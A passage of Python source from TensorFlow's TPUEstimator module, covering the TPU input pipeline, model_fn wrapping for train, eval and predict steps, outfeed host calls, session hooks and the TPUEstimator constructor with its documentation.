self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder()
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_hooks = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
all_hooks.extend(hooks)
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if is_dataset:
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, all_hooks, run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
# Perform some sanity checks to log user friendly information. We should
# error out to give users better error message. But, if
# _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
# user code, so, log a warning.
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/programmers_guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, TPUEstimatorSpec):
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, TPUEstimatorSpec) and
estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return train_step, host_call, captured_scaffold_fn
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, TPUEstimatorSpec):
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
to_record = {}
identity_fn = lambda **kwargs: kwargs
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(tpu_estimator_spec.predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return predict_step, host_calls, captured_scaffold_fn
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
model_fn_args = util.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
if isinstance(params, hparam.HParams):
params.add_hparam(_BATCH_SIZE_KEY, batch_size_for_model_fn)
else:
params[_BATCH_SIZE_KEY] = batch_size_for_model_fn
estimator_spec = self._model_fn(features=features, **kwargs)
if (self._ctx.is_running_on_cpu(is_export_mode) and
isinstance(estimator_spec, TPUEstimatorSpec)):
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, TPUEstimatorSpec):
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(err_msg.format('training_chief_hooks'))
if estimator_spec.training_hooks:
raise ValueError(err_msg.format('training_hooks'))
if estimator_spec.evaluation_hooks:
raise ValueError(err_msg.format('evaluation_hooks'))
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = util.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return []
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
tpu_device_placement_fn = self._ctx.tpu_device_placement_function
for i in xrange(self._ctx.num_replicas):
with ops.device(tpu_device_placement_fn(i)):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos+len(self._tensors[name])]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(core_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Count examples during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
examples_per_sec = self._batch_size * elapsed_steps / elapsed_time
if self._summary_writer is not None:
example_summary = Summary(value=[
Summary.Value(tag='examples_sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(example_summary, global_step)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker).
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
Exporting `SavedModel` support on TPU is not yet implemented. So,
`export_savedmodel` is executed on CPU, even if `use_tpu` is true.
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator`. For training, the
returned `EstimatorSpec` cannot have hooks as it is not supported in
`TPUEstimator`.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but existed in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _TPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.computation_shape):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _TPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size,
eval_batch_size, predict_batch_size,
use_tpu)
self._is_input_fn_invoked = None
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = util.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
if isinstance(kwargs['params'], hparam.HParams):
kwargs['params'].add_hparam(_BATCH_SIZE_KEY, batch_size_for_input_fn)
else:
kwargs['params'][_BATCH_SIZE_KEY] = batch_size_for_input_fn
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn():
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
